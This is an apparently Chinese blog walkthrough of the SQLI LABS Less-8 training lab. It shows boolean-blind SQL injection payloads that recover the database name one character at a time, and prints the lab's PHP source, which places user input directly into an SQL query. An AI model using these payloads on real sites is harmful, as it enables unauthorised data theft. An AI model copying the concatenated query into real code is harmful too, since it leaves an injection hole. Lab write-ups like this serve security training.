关注这个靶场的其它相关笔记：SQLI LABS —— 靶场笔记合集-CSDN博客

0x01：过关流程

输入下面的链接进入靶场（如果你的地址和我不一样，按照你本地的环境来）：

 http://localhost/sqli-labs/Less-8/

靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询，那我们就按它的意思传入 id 看看网页返回的结果：

可以看到，服务器返回了 You are in...........，似乎是认可了我们的操作，但是我们并没有获得什么有效的信息。此时，我们可以再输入几个数据进行测试：

 测试 Payload 01: ?id=1   # 结果: You are in...........
 测试 Payload 02: ?id=2   # 结果: You are in...........
 测试 Payload 03: ?id=2-1 # 结果: You are in...........
 测试 Payload 04: ?id=1'  # 结果: 空
 测试 Payload 05: ?id=1"  # 结果: You are in...........

可以看到，当我们传递 ?id=1' 给服务器后端时，页面显示为空。当我们传递 ?id=1" 给服务器时，它又显示了 You are in...........。此时再结合一下 MySQL 数据库的特性：

我们可以推断出，当我们传递 ?id=1' 给服务器后端时，可能 ' 号与服务器后端 SQL 模板闭合了，导致报错了，所以没有回显出任何内容，所以，我们可以推测出目标后端的 SQL 模板如下：

 select username,password from users where id='$_GET["id"]' LIMIT 0,1;

根据上面的 SQL 模板，我们可以构造如下 Payload 对目标发起攻击（使用布尔盲注）：

 -- 获取当前服务器正在使用的数据库的名称的长度
 攻击 Payload: ?id=1' and if(length(database())=1,1,0) --+'
 笔者备注: 当返回 You are in........... 时，证明猜测正确，否则猜测错误
 ​
 -- 以下是攻击成功的 Payload 的示例
 Payload - 猜测目标数据库名长度: ?id=1' and if(length(database())=8,1,0) --+'
 Payload - 获取数据库第一个字符: ?id=1' and if(mid(database(),1,1)='s',1,0) --+'
 Payload - 获取数据库第二个字符: ?id=1' and if(mid(database(),2,1)='e',1,0) --+'
 ....

可以看到，我们已经成功获取了当前站点使用的后端数据库的信息。至此，Less-8 GET-Blind-Boolian Based-Single Quotes 成功过关。

0x02：源码分析

下面是 SQLI LABS Less-8 GET-Blind-Boolian Based-Single Quotes 后端的部分源码，以及笔者做的笔记：

<?php
 //including the Mysql connect parameters.
 include("../sql-connections/sqli-connect.php"); // 获取数据库连接函数
 error_reporting(0);
 // take the variables
 if (isset($_GET['id'])) {
     $id = $_GET['id']; // 获取通过 GET 方式传递过来的 id 的值
     //logging the connection parameters to a file for analysis.
     $fp = fopen('result.txt', 'a');
     fwrite($fp, 'ID:' . $id . "\n");
     fclose($fp);
 ​
     // connectivity 
 ​
 ​
     $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";  // 后端的数据库查询模板
     $result = mysqli_query($con1, $sql);
     $row = mysqli_fetch_array($result, MYSQLI_BOTH);
 ​
     if ($row) { // 如果查询出结果，返回 You are in...........
         echo '<font size="5" color="#FFFF00">';
         echo 'You are in...........';
         echo "<br>";
         echo "</font>";
     } else {
         // 如果没有查询出结果，啥也不返回，把报错信息也给注释了
         echo '<font size="5" color="#FFFF00">';
         //echo 'You are in...........';
         //print_r(mysqli_error($con1));
         //echo "You have an error in your SQL syntax";
         echo "</br></font>";
         echo '<font color= "#0000ff" font size= 3>';
     }
 } else {
     echo "Please input the ID as parameter with numeric value";
 }
 ?>